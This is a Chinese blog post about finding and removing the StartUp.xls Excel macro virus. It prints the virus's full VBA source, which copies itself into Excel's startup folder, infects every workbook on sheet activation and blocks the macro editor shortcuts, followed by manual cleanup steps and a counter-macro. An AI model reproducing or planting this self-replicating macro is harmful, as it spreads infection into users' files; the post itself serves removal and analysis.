遭遇StartUp.xls宏病毒

今天一个朋友让我帮忙看一个问题,说是Excel文件一打开再保存就提示“此文档中包含宏、ActiveX 控件、XML 扩展包信息或Web组件。他们中可能含个人作息,这些作息无法能过设置“工具”菜单下“选项”对话框“安全性”选项卡中的“保存时从文件属性中删除个人作息”来删除”。当时只是以为设置的问题,后来查了好几小时才发现原来是中了个宏病毒,名字是:StartUp.xls,中间定位病毒的过程也比较曲折(主要是自己学艺不精)。

病毒样本如下:

Sub auto_open()
    On Error Resume Next
    If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then
        Application.ScreenUpdating = False
        ThisWorkbook.Sheets("StartUp").Copy
        ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls")
        n$ = ActiveWorkbook.Name
        ActiveWindow.Visible = False
        Workbooks("StartUp.xls").Save
        Workbooks(n$).Close (False)
    End If
    Application.OnSheetActivate = "StartUp.xls!cop"
    Application.OnKey "%{F11}", "StartUp.xls!escape"
    Application.OnKey "%{F8}", "StartUp.xls!escape"
End Sub
Sub cop()
    On Error Resume Next
    If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then
        Application.ScreenUpdating = False
        n$ = ActiveSheet.Name
        Workbooks("StartUp.xls").Sheets("StartUp").Copy before:=Worksheets(1)
        Sheets(n$).Select
    End If
End Sub
Sub back()
    On Error Resume Next
    Application.OnKey "%{F8}", "StartUp.xls!escape"
    Application.OnKey "%{F11}", "StartUp.xls!escape"
    Application.OnSheetActivate = "StartUp.xls!cop"
    Application.OnTime Now + TimeValue("00:00:01"), "StartUp.xls!cop"
    Workbooks.Open Application.StartupPath & "\StartUp.xls"
End Sub

Sub escape()
    On Error Resume Next
    Application.OnSheetActivate = "StartUp.xls!back"
    Application.OnKey "%{F11}"
    Application.OnKey "%{F8}"
    Application.SendKeys "%{F11}"
    Application.SendKeys "%{F8}"
    For Each book In Workbooks
        Application.DisplayAlerts = False
        If book "StartUp.xls" Then book.Sheets("StartUp").Delete
    Next
    For Each book In Workbooks
        If book.Name = "StartUp.xls" Then
            book.Close
        End If
    Next
End Sub

 

通过参考网上一些资料,采取以下的方法处理,可以清除病毒并使感染文件在修改保存后也清除病毒(网上有人说用360或卡巴直接杀会导致文件打不开,没有试验,不知是真是假):

一、删除

C:\Documents and Settings\Administrator\Application Data\Microsoft\Excel\Excel11.xls

,该文件删除后,Excel会自动重建的;

 

二、删除

C:\Documents and Settings\Administrator\Application Data\Microsoft\Excel\XLSTART\StartUp.xls

 

三、新建一个空的StartUp.xls,然后录制宏(随便录,只是为了能打开VBA编辑器);

 

四、从“工具->宏->宏”里面,选择刚才录制的宏,选择“编辑”,把全部内容都选中,把用下列内容替换:

Sub auto_open()
    On Error Resume Next
    Application.ScreenUpdating = False
    ActiveWindow.Visible = False
    n$ = ActiveWorkbook.Name
    Workbooks(n$).Close (False)
    Application.OnSheetActivate = "StartUp.xls!cop"
End Sub
Sub cop()
    On Error Resume Next
    Dim VBC As Object
    Dim Name As String
    'Dim delComponent As VBComponent 网上有人贴的代码里有这句,经实测,这句会导致编译错误。VBA中没有VBComponent对象
    Name = "StartUp"
    For Each book In Workbooks
        Set delComponent = book.VBAProject.VBComponents(Name)
        book.VBAProject.VBComponents.Remove delComponent
    Next
End Sub

 五、保存,然后再打开染毒文档,修改保存一下就可以清除掉感染的病毒。

展开阅读全文

没有更多推荐了,返回首页